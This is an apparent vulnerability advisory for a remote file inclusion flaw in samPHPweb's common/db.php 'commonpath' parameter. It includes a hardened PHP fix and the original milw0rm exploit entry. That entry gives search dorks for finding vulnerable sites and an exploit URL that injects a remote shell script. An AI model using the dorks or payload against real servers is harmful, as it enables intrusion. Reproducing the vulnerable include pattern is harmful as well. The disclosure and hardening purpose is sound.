Vendor: SAM Broadcaster
By: Crackers_Child
CVSS: 8.5 (HIGH)
Type: Remote File Include
CWE: 98
Product Name: SAM Broadcaster
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
Year: 2008

samPHPweb Remote File Include Vulnerability

A remote file include vulnerability exists in samPHPweb, which allows an attacker to include a remote file on the affected server. The vulnerability is due to insufficient sanitization of user-supplied input to the 'commonpath' parameter of the 'db.php' script. An attacker can exploit it by sending a maliciously crafted HTTP request whose 'commonpath' parameter carries the URL of a PHP script; the remote file is then included and executed by the server, giving the attacker arbitrary code execution on the affected host.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to apply the patch immediately.
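The include pattern the advisory describes, shown as a hypothetical reconstruction beside a hardened form. This is an added example, not samPHPweb's code: the assumption is that common/db.php builds an include path from the 'commonpath' request parameter; the allow-list keys, directory names, and 'config.php' file name are invented for illustration.

```php
<?php
// Added example, not samPHPweb's own code. Assumes (hypothetically) that
// common/db.php derives an include path from the 'commonpath' parameter.

// --- Vulnerable pattern (reconstructed, hypothetical) ---
// With allow_url_include=On (allowed before PHP 7.4 and still configurable
// in older releases), a value such as http://host/x.php? makes PHP fetch
// and execute a remote script; any value can also traverse the local disk.
function load_common_vulnerable(): void
{
    $commonpath = $_GET['commonpath'];
    include $commonpath . '/config.php';
}

// --- Hardened pattern ---
// The directory is never taken verbatim from the request. A caller that
// must pick between a few layouts selects a key from a fixed allow-list,
// and the resolved path is verified to stay under the application root.
const APP_ROOT = __DIR__;
const COMMON_DIRS = [            // invented names for the example
    'default' => 'common',
    'legacy'  => 'common_v1',
];

function load_common_hardened(string $choice): void
{
    if (!array_key_exists($choice, COMMON_DIRS)) {
        http_response_code(400);
        exit('invalid commonpath');
    }
    $root   = realpath(APP_ROOT);
    $target = realpath($root . '/' . COMMON_DIRS[$choice] . '/config.php');
    // realpath() returns false for missing files and collapses '..', so a
    // prefix check on the canonical path rejects anything outside $root.
    $prefix = $root . DIRECTORY_SEPARATOR;
    if ($target === false || strncmp($target, $prefix, strlen($prefix)) !== 0) {
        http_response_code(400);
        exit('invalid commonpath');
    }
    include $target;
}

load_common_hardened($_GET['commonpath'] ?? 'default');
```

Keep allow_url_include=Off in php.ini as well: the allow-list removes the need for remote includes, and the ini setting closes the class of bug even if another script makes the same mistake.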

Exploit-DB raw data:

+______________________________________________By Crackers_Child___________________________________________+

*
*
*    [~] Script.......:       samPHPweb
*    [~] Page.........:       http://support.spacialaudio.com/forums/viewforum.php?f=22  & http://www.spacialaudio.com/
*    [~] Author.......:       Crackers_Child  | cybermilitan@hotmail.com & localexploit@hotmail.com
*    [~] Class........:       Remote File Include Vulnerability
*    [~] Dork.........:       This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions, LLC 1999 - 2004.
*    [~] Dork.........:       This page was produced using SAM Broadcaster. © Copyright Spacial Audio Solutions
*    [~] Dork.........:       This page was produced using SAM2 (Streaming Audio Manager)
+_______________________________________________________________________________________________________________________+


+_______________________________________________________________________________________________________________________+
*
*
*     
*
*       [~] Exploit Rfi...:     http://[Target]/[Path]/common/db.php?commonpath=sh3lz?
*
*                             
+_______________________________________________________________________________________________________________________+



        [~] Info......: Can Yakar . . .
                      



+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
*
*
*       [~] Special Thanx.......:    str0ke, BiyoSecurity.Net, SiberSavascilar.com And All F3ckers :)
*
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2008-01-04]